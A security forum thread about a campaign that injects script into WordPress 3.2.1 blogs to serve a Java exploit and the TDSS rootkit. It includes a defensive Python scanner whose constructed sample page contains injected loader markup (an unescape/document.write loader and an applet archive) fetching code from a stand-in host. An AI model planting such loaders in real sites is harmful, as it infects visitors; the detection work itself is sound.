Hackers Infect WordPress 3.2.1 Blogs to Distribute TDSS Rootkit

Status
Not open for further replies.

MrXidus

Super Moderator (Leave of absence)
Thread author
Apr 17, 2011
2,503
Hackers are compromising WordPress 3.2.1 blogs in order to infect their visitors with the notorious TDSS rootkit, according to researchers from Web security firm Websense.

It's not clear how the websites are being compromised, but there are publicly known exploits for vulnerabilities that affect WordPress 3.2.1, which is an older version of the popular blog publishing platform.

Once they gain unauthorized access to a blog, the attackers inject malicious JavaScript code into its pages in order to load a Java exploit from a third-party server.

"From our analysis the number of infections is growing steadily (100+)," said Websense principal security researcher Stephan Chenette in a blog post on Monday. The company's research into this mass code injection campaign indicates that whoever is behind it is experienced.

The Java vulnerability exploited in the attack is known as CVE-2011-3544 and allows the remote execution of arbitrary code. In this case, the attackers are leveraging it to install a version of the TDSS rootkit on the computers of people visiting the website.

Read more...

---

In my own findings I went ahead and tried to test this exploit. I downloaded the said Java version mentioned in the vulnerability report here.

You can watch my video here. The malicious site that was serving the exploit returns 404. A disappointment as I was wanting to get my hands on this Rootkit for the Malware Hub ;)

Maybe it's being served elsewhere on a new domain and other members could find the sample and perhaps share it in the Malware Hub.

Cheers.
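The article above describes the injection step of this campaign: script or applet loaders added to a compromised blog's pages so that visitors fetch a Java exploit from a third-party host. The following is an added defensive example written for this thread, not code from the post, from Websense or from WordPress. It scans a saved copy of a page for the three things that step leaves behind: scripts loaded from hosts outside a site allowlist, inline scripts using decode-then-write patterns, and `<applet>`/`<embed>`/`<object>` tags that load plugin content. The allowlist, the hostnames and the sample page are constructed for illustration; the inline markers are a heuristic, not a signature.

```python
"""Scan a WordPress page for injected script or applet loaders.

Added defensive example for this thread; not from the original post,
Websense or WordPress. The hostnames, allowlist and sample page are
constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the example).
ALLOWED_HOSTS = {"blog.example.test", "ajax.googleapis.com"}

# Decode-then-write patterns common in obfuscated injections. Heuristic only:
# legitimate code can use them, so findings are leads for review, not verdicts.
INLINE_MARKERS = ("eval(", "unescape(", "document.write(", "fromCharCode(")


class _InjectionScanner(HTMLParser):
    """Collects (line, kind, detail) findings while the page is parsed."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.findings = []
        self._in_script = False
        self._script_buf = []
        self._script_line = 0

    def _external(self, url):
        # Relative URLs have no hostname and are treated as same-origin.
        host = urlparse(url).hostname
        return host is not None and host not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        line, _ = self.getpos()
        if tag == "script":
            src = attrs.get("src")
            if src:
                if self._external(src):
                    self.findings.append((line, "external-script", src))
            else:
                # Inline script: buffer the body and inspect it at </script>.
                self._in_script = True
                self._script_buf = []
                self._script_line = line
        elif tag in ("applet", "embed", "object"):
            ref = (attrs.get("code") or attrs.get("archive")
                   or attrs.get("src") or attrs.get("data") or "")
            self.findings.append((line, f"plugin-tag:{tag}", ref))
        elif tag == "iframe":
            src = attrs.get("src", "")
            if self._external(src):
                self.findings.append((line, "external-iframe", src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            hits = [m for m in INLINE_MARKERS if m in body]
            if hits:
                self.findings.append(
                    (self._script_line, "inline-obfuscation", ",".join(hits)))


def scan_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (line, kind, detail) findings for one HTML document."""
    scanner = _InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal theme header plus three injected elements.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script>document.write(unescape('%3Cscript%20src%3D%22//loader.example.test/a.js%22%3E%3C/script%3E'));</script>
</head><body>
<h1>My blog</h1>
<script src="//loader.example.test/a.js"></script>
<applet code="hypothetical-applet.class" archive="http://loader.example.test/e.jar" width="1" height="1"></applet>
</body></html>"""

if __name__ == "__main__":
    for line, kind, detail in scan_page(SAMPLE_PAGE):
        print(f"line {line}: {kind} -> {detail}")
```

Run it against files pulled from the web root (theme `header.php`/`footer.php`, or rendered pages fetched with curl) rather than the live site in a browser, and compare the allowlist against the plugins and CDNs the site actually uses; protocol-relative `//host/...` URLs are resolved to a hostname so they are not mistaken for local paths.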
 

Prorootect

Level 69
Verified
Nov 5, 2011
5,855
WordPress Security new version releases: on wordpress.org: http://wordpress.org/news/category/security/

WP Security Scan: on wordpress.org: http://wordpress.org/extend/plugins/wp-security-scan/

So we must remain vigilant and always be informed of top security news. :cool:
 

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,378
WordPress 3.2.1 was released on July 12, 2011; any remotely responsible admin should have updated the platform by now...
while any remotely responsible user should have updated Java to the latest version...
A TDSS rootkit is a very nasty piece of malware; hopefully the users who got infected have heard of Kaspersky TDSSKiller.
 